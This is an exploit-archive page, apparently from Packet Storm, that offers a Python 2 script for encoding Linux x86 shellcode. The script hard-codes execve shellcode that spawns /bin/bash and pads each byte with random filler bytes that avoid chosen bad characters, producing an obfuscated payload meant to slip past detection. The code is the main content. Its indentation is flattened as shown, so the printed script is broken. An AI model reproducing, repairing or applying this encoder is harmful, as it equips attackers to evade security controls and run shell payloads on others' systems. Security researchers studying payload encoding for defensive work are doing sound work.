exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Random Insertion Encoder / Decoder Shellcode Generator

Linux/x86 Random Insertion Encoder / Decoder Shellcode Generator
Posted Feb 6, 2019
Authored by Aditya Chaudhary

Linux/x86 random insertion encoder and decoder shellcode generator.

tags | x86, shellcode
systems | linux
SHA-256 | 1c874cdca741bb9b1f5cb83bff6c4ba8db8cdc97becf03410749a4943debc7e3

Linux/x86 Random Insertion Encoder / Decoder Shellcode Generator

Change Mirror Download
#!/usr/bin/python
# Python Random Insertion Encoder
# Author: Aditya Chaudhary
# Date: 5th Feb 2019


import random
import sys
import argparse

shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--entropy", help="Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)", type=int)
parser.add_argument("-b", "--badchars", help="Badchars to removed from inserted bytes", type=str)
args = parser.parse_args()


encoded = ""
encoded2 = ""


entropy = args.entropy
bad_chars = args.badchars
#print len(sys.argv)
#if len(sys.argv) > 1:
# entropy = int(sys.argv[1])

print '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)

#if len(sys.argv) < 3:
# print '[#] No Bad characters provided'
#else:
# bad_chars = str(sys.argv[2])
bad_chars = bad_chars.split(',')
print '[#] Bad chars: %s'%(bad_chars)

# Generate byte string from \x01 to \xff
chars = []
for o in range(256):
#print(hex(o))
ch = '%02x' % o
if ch not in bad_chars:
chars.append(ch)


print '[#] Generating Shellcode...'

repeat = 0

for x in bytearray(shellcode) :
repeat = random.randint(1, entropy)
#print "[#]"+str(repeat)
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x'
encoded += '%02x'% repeat

encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x'
encoded2 += '%02x,' % repeat

en_byte = ""
for i in range(1, repeat+1):
# print i
en_byte = chars[random.randint(0, len(chars)-1)]

encoded += '\\x%s' % en_byte
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x%s,' % en_byte
# encoded2 += '0x%02x,' % random.randint(1,255)
#encoded += '\n'


print '[#] Encoded shellcode:'

print encoded
print encoded2

print '[#] Shellcode Length: %d' % len(bytearray(shellcode))
print '[#] Encoded Shellcode Length: %d' % encoded.count('x')
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close